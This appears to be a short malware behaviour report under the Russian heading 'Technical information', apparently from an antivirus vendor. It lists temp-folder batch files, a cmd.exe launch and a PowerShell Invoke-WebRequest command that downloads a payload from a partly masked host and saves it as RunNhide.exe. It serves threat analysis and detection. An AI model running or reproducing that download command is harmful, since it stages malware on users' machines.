Техническая информация
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Temp\lua.cmd" "
- %WINDIR%\temp\regles10.cmd
- %WINDIR%\temp\lua.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Invoke-WebRequest ""https://www.cj##nt.com/doc/21_06/KFynmhmMg13_RunNHide.oui"" -outfile ""%WINDIR%\Temp\RunNhide.exe""